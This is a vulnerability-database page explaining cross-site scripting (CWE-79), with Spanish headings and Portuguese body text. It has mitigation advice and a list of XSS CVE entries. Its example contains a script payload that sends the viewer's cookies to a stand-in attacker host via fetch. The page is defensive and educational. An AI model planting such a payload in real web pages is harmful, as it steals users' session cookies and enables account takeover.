Fallos del tipo CWE-79

29.081 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-49593MEDIUMIn Advanced Custom Fields (ACF) before 6.3.9 and Secure Custom Fields before 6.3.6.3 (plugins for WordPress), using the Field Group editor tEPSS 0.5%CVE-2022-40712MEDIUMAn issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /cgi-bin/R14.2* endpoints.EPSS 0.5%CVE-2023-7075LOWcode-projects Point of Sales and Inventory Management System checkout.php cross site scriptingEPSS 0.5%CVE-2022-25276MEDIUMThe Media oEmbed iframe route does not properly validate the iframe domain setting, which allows embeds to be displayed in the context of thEPSS 0.5%CVE-2022-34315MEDIUMIBM CICS TX cross-site scriptingEPSS 0.5%CVE-2023-1243MEDIUMCross-site Scripting (XSS) - Stored in answerdev/answerEPSS 0.5%CVE-2024-44085MEDIUMONLYOFFICE Docs before 8.1.0 allows XSS via a GeneratorFunction Object attack against a macro. This is related to use of an immediately-invoEPSS 0.5%CVE-2023-1239MEDIUMCross-site Scripting (XSS) - Reflected in answerdev/answerEPSS 0.5%CVE-2024-7874MEDIUMXSS in Tungsten Automation TotalAgilityEPSS 0.5%CVE-2017-7534—OpenShift Enterprise version 3.x is vulnerable to a stored XSS via the log viewer for pods. The flaw is due to lack of sanitation of user inEPSS 0.5%CVE-2024-11246MEDIUMcode-projects Farmacia adicionar-cliente.php cross site scriptingEPSS 0.5%CVE-2025-27637MEDIUMVasion Print (formerly PrinterLogic) before Virtual Appliance Host 22.0.1002 Application 20.0.2614 allows Cross-Site Scripting V-2024-016.EPSS 0.5%CVE-2025-24853HIGHApache JSPWiki: Cross-Site Scripting (XSS) in JSPWiki Header Link processingEPSS 0.5%CVE-2022-39375MEDIUMCross-Site Scripting (XSS) through public RSS feed in GLPIEPSS 0.5%CVE-2024-0449MEDIUMArtiBot Free Chat Bot for WordPress WebSites <= 1.1.6 - Authenticated (Admin+) Cross-Site ScriptingEPSS 0.5%CVE-2022-36137MEDIUMChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.EPSS 0.5%CVE-2023-33548MEDIUMCross Site Scripting (XSS) vulnerability in ASUS RT-AC51U with firmware versions up to and including 3.0.0.4.380.8591 allows attackers to ruEPSS 0.5%CVE-2023-23627MEDIUMSanitize vulnerable to Cross-site Scripting via Improper neutralization of `noscript` elementEPSS 0.5%CVE-2026-15217HIGHImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLabEPSS 0.5%CVE-2026-40598MEDIUMMantisBT has Potential Referer-Based Reflected HTML Injection / XSS in Tag Update PageEPSS 0.5%